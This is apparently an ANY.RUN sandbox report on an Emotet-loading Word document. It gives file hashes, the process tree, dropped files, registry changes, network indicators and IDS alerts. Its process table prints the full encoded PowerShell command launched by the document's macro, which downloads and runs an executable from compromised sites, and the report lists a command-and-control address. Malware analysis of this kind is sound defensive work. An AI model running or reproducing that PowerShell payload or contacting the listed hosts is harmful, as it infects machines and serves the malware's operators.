analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

9uk8v1s-x46hg-xsrrjdr

Full analysis: https://app.any.run/tasks/7d1d7e25-7824-4b7a-83b9-d44d46913fbf
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: April 15, 2019, 08:40:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 15 07:56:00 2019, Last Saved Time/Date: Mon Apr 15 07:56:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0
MD5:

D48FFB5CBAE653D9F84FB3C0C383AADF

SHA1:

D5B66C17DE8C309F0B1E11BB9286957D550F9AB7

SHA256:

1E2DBB4286CDFE173DA5DCC33A498144A0247B63EE9A8177D1A477DF11EED4C5

SSDEEP:

6144:L77HUUUUUUUUUUUUUUUUUUUT52VCPQAMUA0AUJkJn091lVDaMH:L77HUUUUUUUUUUUUUUUUUUUTCEQ1UAn8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 421.exe (PID: 2148)
      • soundser.exe (PID: 3288)
      • soundser.exe (PID: 2180)
      • 421.exe (PID: 2552)
    • Downloads executable files from the Internet

      • PoWeRsHelL.exe (PID: 2440)
    • Emotet process was detected

      • soundser.exe (PID: 2180)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • PoWeRsHelL.exe (PID: 2440)
      • 421.exe (PID: 2552)
    • Creates files in the user directory

      • PoWeRsHelL.exe (PID: 2440)
    • Application launched itself

      • 421.exe (PID: 2148)
      • soundser.exe (PID: 2180)
    • Starts itself from another location

      • 421.exe (PID: 2552)
    • Connects to server without host name

      • soundser.exe (PID: 3288)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 11
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 11
Words: 1
Pages: 1
ModifyDate: 2019:04:15 06:56:00
CreateDate: 2019:04:15 06:56:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 421.exe no specs 421.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9uk8v1s-x46hg-xsrrjdr.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2440PoWeRsHelL -e JABtAEEAUQA0AEIAQQBVADQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAagAnACwAJwBaAEEAQwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAF8AQwAnACwAJwBfAEEAJwApACkAOwAkAHUAWABEAEEAQQBVACAAPQAgACcANAAyADEAJwA7ACQATQBBAFgAMQBYAHcAXwA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAQQBBACcALAAnADEAWgAnACkALAAnAF8AJwApADsAJABGAEMAawAxAFUAQwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBYAEQAQQBBAFUAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlACcALAAnAC4AZQB4ACcAKQA7ACQASgBEAFEAUQBBAEIAQQB3AD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBYAFoAJwAsACcAUQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBsAEEAWAAnACwAJwBBAGMAJwApACkAOwAkAEoAQQBRAEEAQQBRAD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAGAAVwBgAEUAQgBjAGwAaQBlAGAATgB0ADsAJABiAFEAawBjAEEAawBHAEEAPQAoACIAewAxADAAfQB7ADUAfQB7ADEANQB9AHsAMgAwAH0AewAxADMAfQB7ADIAfQB7ADcAfQB7ADIANAB9AHsANgB9AHsAMQB9AHsAOAB9AHsAMAB9AHsAMgA4AH0AewAyADIAfQB7ADkAfQB7ADEANwB9AHsAMgA3AH0AewAxADQAfQB7ADMAMQB9AHsAMwB9AHsAMQAyAH0AewAyADEAfQB7ADIANgB9AHsAMwAwAH0AewAyADUAfQB7ADQAfQB7ADIAOQB9AHsAMQA2AH0AewAxADgAfQB7ADEAMQB9AHsAMgAzAH0AewAxADkAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBnAGkAJwAsACcALgBpACcALAAnAGUAcgBtACcAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAXwAnACwAJwBNAC8AQABoACcAKQAsACcALwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHAAOgAnACwAJwB0AHQAJwApACkALAAoACIAewA1AH0AewA0AH0AewAxAH0AewAwAH0AewAyAH0AewAzAH0AIgAtAGYAIAAnAG0AaQAnACwAJwBhAGQAJwAsACcAbgAvACcALAAnAHgAXwBnACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAGMAbwBtAC8AJwAsACcAOAAuACcALAAnAHcAcAAtACcAKQAsACcAaAAyADIAJwApACwAJwBLACcALAAoACIAewA1AH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AewAyAH0AewA2AH0AIgAgAC0AZgAgACcAdAAnACwAJwBnAGUAdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBmAGkAdAAnACwAJwBhAHQANQAnACkALAAnADoALwAvACcALAAnAHQAcAAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBJAF8AOABMAC8AQABoACcALAAnADIAJwAsACcALwBJACcAKQAsACcAMAAnACkALAAnAHAAJwAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwAvAHQAZgAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGUAdAAnACwAJwBuACcALAAnAC8AaQBtAGEAJwApACwAJwBnAGUAcwAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAtAGYAIAAnAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBrACcALAAnAC8AaABlACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcALwBAAGgAJwAsACcAdAB0AHAAOgAnACkALAAnAGUAJwApACwAJwBoACcALAAnAHAAJwAsACcAaAB0AHQAJwAsACcAbgAnACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBAAGgAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAOgAvACcALAAnAHQAdABwACcAKQAsACcAZQAnACwAJwAvACcAKQAsACcAcgBjACcALAAnAHUAZAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8ALwAnACwAJwBjAGgAJwApACwAJwA6ACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHAALQAnACwAJwBjAG8AJwApACwAJwB3ACcALAAnAG0ALwAnACkALAAnAC0AaQAnACwAJwBuAHQAZQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwA0ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBfAEUAcQAnACwAJwAvACcAKQApACwAJwB1ACcALAAnAC8AdABlACcALAAnAHcAJwAsACcAdAAvAHoAJwAsACcALgAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAZABvAHMAJwAsACcAYQAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBzACcALAAnAHgALwBFACcAKQApACwAJwBwAGEAJwAsACcAbgBjAGwAJwAsACcAcgAvACcALAAnAC4AYwBvACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAZAAnACwAJwBpAC4AbQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlAHMAJwAsACcALwBpAE0AJwApACwAJwBfACcAKQApAC4AIgBzAGAAUABMAGkAdAAiACgAJwBAACcAKQA7ACQAUgBBAFEAQwBBAEIAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwA0AEIAJwAsACcAYwBvACcAKQAsACcAQQAnACkALAAnAG4AQQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABLAEEARAB3AEEAQgAgAGkAbgAgACQAYgBRAGsAYwBBAGsARwBBACkAewB0AHIAeQB7ACQASgBBAFEAQQBBAFEALgAiAEQAYABPAHcATgBsAG8AYABBAGQAYABGAEkAbABlACIAKAAkAEsAQQBEAHcAQQBCACwAIAAkAEYAQwBrADEAVQBDACkAOwAkAGYAQgBCAEEAWABBAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFUAQQAnACwAJwBBAEQAYwAnACkALAAnAHYAJwAsACcAQQBfACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABGAEMAawAxAFUAQwApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMAA2ADAAMwApACAAewAuACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACAAJABGAEMAawAxAFUAQwA7ACQAZgBvAEQAQQBaAG8AdwBRAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAQQAnACwAJwBpAEEAQQAnACwAJwBrAG8AJwApADsAYgByAGUAYQBrADsAJABOAF8AMQB3AEIAQQBrAHgAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBXAEcAJwAsACcAeABYACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABBAEEAJwAsACcAVQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVABYAEMAQQBjAFoAQQBDAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAegAnACwAJwBVACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAQQAnACwAJwBBAEEAUQAnACkALAAnAGsAVQAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2148"C:\Users\admin\421.exe" C:\Users\admin\421.exePoWeRsHelL.exe
User:
admin
Company:
360. cn
Integrity Level:
MEDIUM
Description:
360 FirstAid
Exit code:
0
Version:
1, 0, 0, 1007
Modules
Images
c:\users\admin\421.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2552--725acb31C:\Users\admin\421.exe
421.exe
User:
admin
Company:
360. cn
Integrity Level:
MEDIUM
Description:
360 FirstAid
Exit code:
0
Version:
1, 0, 0, 1007
Modules
Images
c:\users\admin\421.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2180"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
421.exe
User:
admin
Company:
360. cn
Integrity Level:
MEDIUM
Description:
360 FirstAid
Exit code:
0
Version:
1, 0, 0, 1007
Modules
Images
c:\users\admin\appdata\local\soundser\soundser.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
3288--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Company:
360. cn
Integrity Level:
MEDIUM
Description:
360 FirstAid
Version:
1, 0, 0, 1007
Modules
Images
c:\users\admin\appdata\local\soundser\soundser.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
1 714
Read events
1 232
Write events
477
Delete events
5

Modification events

(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:*!=
Value:
2A213D00C40B0000010000000000000000000000
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3012) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1317994526
(PID) Process:(3012) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1317994640
(PID) Process:(3012) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1317994641
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
C40B0000D0DAE02967F3D40100000000
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:c"=
Value:
63223D00C40B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:c"=
Value:
63223D00C40B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3012) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR618A.tmp.cvr
MD5:
SHA256:
2440PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YXR7M4RO8X8NHPWZKUG6.temp
MD5:
SHA256:
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$k8v1s-x46hg-xsrrjdr.docpgc
MD5:B7D6BCF1406C3A81F4FACE4AF461F39B
SHA256:F151199D40BB01BBE2F4EE4DDF800A4EB2BDBE583E9F8C2B8FBB34D84E6036B4
2440PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106b8d.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:03F75A861CC10AD1C3318BEB891B725B
SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:4D112EFC9126CDA95038609F0E198FE2
SHA256:3DA8B3EC1890A23C241B29F7C7A4C0BC3F982CC0ED2D763BB6D0AC9C0F2A4F0A
2440PoWeRsHelL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2552421.exeC:\Users\admin\AppData\Local\soundser\soundser.exeexecutable
MD5:E5CEE5316BB5E8861E4C29B2588487FB
SHA256:FB12B79D6CB23FA7E573F47EC682D5EBE14A52A1195F5852C404D3FA925C5F03
2440PoWeRsHelL.exeC:\Users\admin\421.exeexecutable
MD5:E5CEE5316BB5E8861E4C29B2588487FB
SHA256:FB12B79D6CB23FA7E573F47EC682D5EBE14A52A1195F5852C404D3FA925C5F03
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2440
PoWeRsHelL.exe
GET
200
104.18.32.28:80
http://church228.com/wp-admin/x_g/
US
executable
138 Kb
suspicious
3288
soundser.exe
POST
117.193.28.115:80
http://117.193.28.115/walk/
IN
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2440
PoWeRsHelL.exe
104.18.32.28:80
church228.com
Cloudflare Inc
US
shared
117.193.28.115:80
National Internet Backbone
IN
malicious

DNS requests

Domain
IP
Reputation
church228.com
  • 104.18.32.28
  • 104.18.33.28
suspicious

Threats

PID
Process
Class
Message
2440
PoWeRsHelL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2440
PoWeRsHelL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2440
PoWeRsHelL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2440
PoWeRsHelL.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
No debug info